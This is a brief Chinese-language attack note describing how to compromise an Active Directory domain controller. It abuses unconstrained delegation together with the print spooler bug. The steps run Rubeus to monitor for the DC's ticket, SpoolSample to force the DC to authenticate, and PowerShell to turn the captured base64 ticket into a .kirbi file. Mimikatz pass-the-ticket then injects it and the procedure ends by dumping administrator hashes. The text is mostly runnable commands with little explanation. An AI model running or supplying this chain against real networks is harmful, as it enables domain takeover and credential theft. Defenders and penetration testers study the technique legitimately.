非约束委派+打印机

环境

域控:192.168.110.12 主机名:SYNC-DC
域内主机:192.168.1.101 主机名:mrhonest-pc

条件:

+ 获取到设置了非约束委派的主机system权限

利用方法

• 每秒监听来自域控主机(sync-dc$)的登录请求 现在是system权限
  Rubeus.exe monitor /interval:1 /filteruser:SYNC-DC$
  

• 强制域控打印机回连,需在域用户进程上执行(我这里切换一下帐号),或者有域用户的帐号密码

实际中可以这样,cs上注入一个普通进程上执行,或者使用runas等工具执行
SpoolSample.exe SYNC-DC mrhonest-pc

• 收到票据
  

• 转换票据
  [IO.File]::WriteAllBytes("绝对路径\TGS\ticket.kirbi", [Convert]::FromBase64String("得到的base64"))
  

• 先清空自身票据 然后导入生成的票据
  

• 注入票据
  kerberos::ptt ticket.kirbi
  

• dump admin的hash`